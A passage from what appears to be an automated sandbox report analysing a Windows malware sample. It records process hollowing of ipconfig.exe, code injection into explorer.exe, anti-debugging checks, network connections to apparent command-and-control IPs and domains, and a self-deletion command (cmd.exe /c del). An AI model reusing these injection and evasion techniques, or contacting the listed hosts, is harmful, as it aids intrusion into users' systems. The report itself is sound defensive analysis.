          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17016 mov eax, dword ptr fs:[00000030h]16_2_02C17016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17016 mov eax, dword ptr fs:[00000030h]16_2_02C17016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB0050 mov eax, dword ptr fs:[00000030h]16_2_02BB0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB0050 mov eax, dword ptr fs:[00000030h]16_2_02BB0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC61A0 mov eax, dword ptr fs:[00000030h]16_2_02BC61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC61A0 mov eax, dword ptr fs:[00000030h]16_2_02BC61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C241E8 mov eax, dword ptr fs:[00000030h]16_2_02C241E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2990 mov eax, dword ptr fs:[00000030h]16_2_02BC2990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBC182 mov eax, dword ptr fs:[00000030h]16_2_02BBC182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA185 mov eax, dword ptr fs:[00000030h]16_2_02BCA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9B1E1 mov eax, dword ptr fs:[00000030h]16_2_02B9B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9B1E1 mov eax, dword ptr fs:[00000030h]16_2_02B9B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9B1E1 mov eax, dword ptr fs:[00000030h]16_2_02B9B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C549A4 mov eax, dword ptr fs:[00000030h]16_2_02C549A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C549A4 mov eax, dword ptr fs:[00000030h]16_2_02C549A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C549A4 mov eax, dword ptr fs:[00000030h]16_2_02C549A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C549A4 mov eax, dword ptr fs:[00000030h]16_2_02C549A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C169A6 mov eax, dword ptr fs:[00000030h]16_2_02C169A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C151BE mov eax, dword ptr fs:[00000030h]16_2_02C151BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C151BE mov eax, dword ptr fs:[00000030h]16_2_02C151BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C151BE mov eax, dword ptr fs:[00000030h]16_2_02C151BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C151BE mov eax, dword ptr fs:[00000030h]16_2_02C151BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC513A mov eax, dword ptr fs:[00000030h]16_2_02BC513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC513A mov eax, dword ptr fs:[00000030h]16_2_02BC513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB4120 mov eax, dword ptr fs:[00000030h]16_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB4120 mov eax, dword ptr fs:[00000030h]16_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB4120 mov eax, dword ptr fs:[00000030h]16_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB4120 mov eax, dword ptr fs:[00000030h]16_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB4120 mov ecx, dword ptr fs:[00000030h]16_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99100 mov eax, dword ptr fs:[00000030h]16_2_02B99100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99100 mov eax, dword ptr fs:[00000030h]16_2_02B99100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99100 mov eax, dword ptr fs:[00000030h]16_2_02B99100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9B171 mov eax, dword ptr fs:[00000030h]16_2_02B9B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9B171 mov eax, dword ptr fs:[00000030h]16_2_02B9B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9C962 mov eax, dword ptr fs:[00000030h]16_2_02B9C962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBB944 mov eax, dword ptr fs:[00000030h]16_2_02BBB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBB944 mov eax, dword ptr fs:[00000030h]16_2_02BBB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4FEC0 mov eax, dword ptr fs:[00000030h]16_2_02C4FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68ED6 mov eax, dword ptr fs:[00000030h]16_2_02C68ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2FE87 mov eax, dword ptr fs:[00000030h]16_2_02C2FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA76E2 mov eax, dword ptr fs:[00000030h]16_2_02BA76E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC16E0 mov ecx, dword ptr fs:[00000030h]16_2_02BC16E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C60EA5 mov eax, dword ptr fs:[00000030h]16_2_02C60EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C60EA5 mov eax, dword ptr fs:[00000030h]16_2_02C60EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C60EA5 mov eax, dword ptr fs:[00000030h]16_2_02C60EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C146A7 mov eax, dword ptr fs:[00000030h]16_2_02C146A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC36CC mov eax, dword ptr fs:[00000030h]16_2_02BC36CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD8EC7 mov eax, dword ptr fs:[00000030h]16_2_02BD8EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5AE44 mov eax, dword ptr fs:[00000030h]16_2_02C5AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5AE44 mov eax, dword ptr fs:[00000030h]16_2_02C5AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9E620 mov eax, dword ptr fs:[00000030h]16_2_02B9E620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA61C mov eax, dword ptr fs:[00000030h]16_2_02BCA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA61C mov eax, dword ptr fs:[00000030h]16_2_02BCA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9C600 mov eax, dword ptr fs:[00000030h]16_2_02B9C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9C600 mov eax, dword ptr fs:[00000030h]16_2_02B9C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9C600 mov eax, dword ptr fs:[00000030h]16_2_02B9C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC8E00 mov eax, dword ptr fs:[00000030h]16_2_02BC8E00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAE73 mov eax, dword ptr fs:[00000030h]16_2_02BBAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAE73 mov eax, dword ptr fs:[00000030h]16_2_02BBAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAE73 mov eax, dword ptr fs:[00000030h]16_2_02BBAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAE73 mov eax, dword ptr fs:[00000030h]16_2_02BBAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAE73 mov eax, dword ptr fs:[00000030h]16_2_02BBAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51608 mov eax, dword ptr fs:[00000030h]16_2_02C51608
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA766D mov eax, dword ptr fs:[00000030h]16_2_02BA766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4FE3F mov eax, dword ptr fs:[00000030h]16_2_02C4FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA7E41 mov eax, dword ptr fs:[00000030h]16_2_02BA7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA8794 mov eax, dword ptr fs:[00000030h]16_2_02BA8794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD37F5 mov eax, dword ptr fs:[00000030h]16_2_02BD37F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17794 mov eax, dword ptr fs:[00000030h]16_2_02C17794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17794 mov eax, dword ptr fs:[00000030h]16_2_02C17794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17794 mov eax, dword ptr fs:[00000030h]16_2_02C17794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCE730 mov eax, dword ptr fs:[00000030h]16_2_02BCE730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B94F2E mov eax, dword ptr fs:[00000030h]16_2_02B94F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B94F2E mov eax, dword ptr fs:[00000030h]16_2_02B94F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68F6A mov eax, dword ptr fs:[00000030h]16_2_02C68F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBF716 mov eax, dword ptr fs:[00000030h]16_2_02BBF716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA70E mov eax, dword ptr fs:[00000030h]16_2_02BCA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA70E mov eax, dword ptr fs:[00000030h]16_2_02BCA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6070D mov eax, dword ptr fs:[00000030h]16_2_02C6070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6070D mov eax, dword ptr fs:[00000030h]16_2_02C6070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2FF10 mov eax, dword ptr fs:[00000030h]16_2_02C2FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2FF10 mov eax, dword ptr fs:[00000030h]16_2_02C2FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAFF60 mov eax, dword ptr fs:[00000030h]16_2_02BAFF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAEF40 mov eax, dword ptr fs:[00000030h]16_2_02BAEF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68CD6 mov eax, dword ptr fs:[00000030h]16_2_02C68CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA849B mov eax, dword ptr fs:[00000030h]16_2_02BA849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C514FB mov eax, dword ptr fs:[00000030h]16_2_02C514FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCBC2C mov eax, dword ptr fs:[00000030h]16_2_02BCBC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2C450 mov eax, dword ptr fs:[00000030h]16_2_02C2C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2C450 mov eax, dword ptr fs:[00000030h]16_2_02C2C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB746D mov eax, dword ptr fs:[00000030h]16_2_02BB746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA44B mov eax, dword ptr fs:[00000030h]16_2_02BCA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov ecx, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC35A1 mov eax, dword ptr fs:[00000030h]16_2_02BC35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCFD9B mov eax, dword ptr fs:[00000030h]16_2_02BCFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCFD9B mov eax, dword ptr fs:[00000030h]16_2_02BCFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C48DF1 mov eax, dword ptr fs:[00000030h]16_2_02C48DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAD5E0 mov eax, dword ptr fs:[00000030h]16_2_02BAD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAD5E0 mov eax, dword ptr fs:[00000030h]16_2_02BAD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C605AC mov eax, dword ptr fs:[00000030h]16_2_02C605AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C605AC mov eax, dword ptr fs:[00000030h]16_2_02C605AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C13540 mov eax, dword ptr fs:[00000030h]16_2_02C13540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C43D40 mov eax, dword ptr fs:[00000030h]16_2_02C43D40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9AD30 mov eax, dword ptr fs:[00000030h]16_2_02B9AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBC577 mov eax, dword ptr fs:[00000030h]16_2_02BBC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBC577 mov eax, dword ptr fs:[00000030h]16_2_02BBC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB7D50 mov eax, dword ptr fs:[00000030h]16_2_02BB7D50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68D34 mov eax, dword ptr fs:[00000030h]16_2_02C68D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C1A537 mov eax, dword ptr fs:[00000030h]16_2_02C1A537
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5E539 mov eax, dword ptr fs:[00000030h]16_2_02C5E539
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD3D43 mov eax, dword ptr fs:[00000030h]16_2_02BD3D43
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carterscts.com
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          Source: C:\Windows\explorer.exeDomain query: www.mr-exclusive.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.90.29 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 200000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeMemory written: C:\Users\user\Desktop\NvkGETsSDb.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe C:\Users\user\Desktop\NvkGETsSDb.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.274817479.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeQueries volume information: C:\Users\user\Desktop\NvkGETsSDb.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
